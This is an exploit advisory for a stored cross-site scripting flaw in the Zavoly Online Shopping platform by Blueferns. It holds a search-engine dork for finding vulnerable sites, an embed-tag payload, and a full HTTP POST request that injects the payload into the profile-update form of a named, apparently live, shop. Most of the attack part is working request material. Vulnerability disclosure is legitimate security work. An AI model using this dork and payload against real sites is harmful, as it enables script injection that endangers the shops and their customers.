# Exploit Title: Zavoly Online Shopping - Cross-site Scripting (Stored)
# Exploit Author: saud
# Dork: intext:"© blueferns technologies"
# Homepage: https://www.blueferns.com/
# CVE : CWE-79
# Tested on: Windows 10
payload :
<embed/src=//XSS>
Example exploitation request:
-----------------------------------------------------------------------
POST /trendcart/site_user/update_profile.php HTTP/1.1
Host: dr-scent.com.qa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 250
Origin: http://dr-scent.com.qa
Connection: close
Upgrade-Insecure-Requests: 1
name=<embed/src=//XSS>&email=saud%40test.com&address=rrrrrt&city=rrrrrr&state=&postal_code=12345&country=&phone=00000000000000&ship_address=rrrrrt&ship_city=rrrrrr&ship_state=&ship_postal_code=12345&ship_country=&ship_phone=00000000
-----------------------------------------------------------------------
### [ Contacts: ] ###
[#] Telegram: @x0Saudi
[#] Twitter: @Dmaral3noz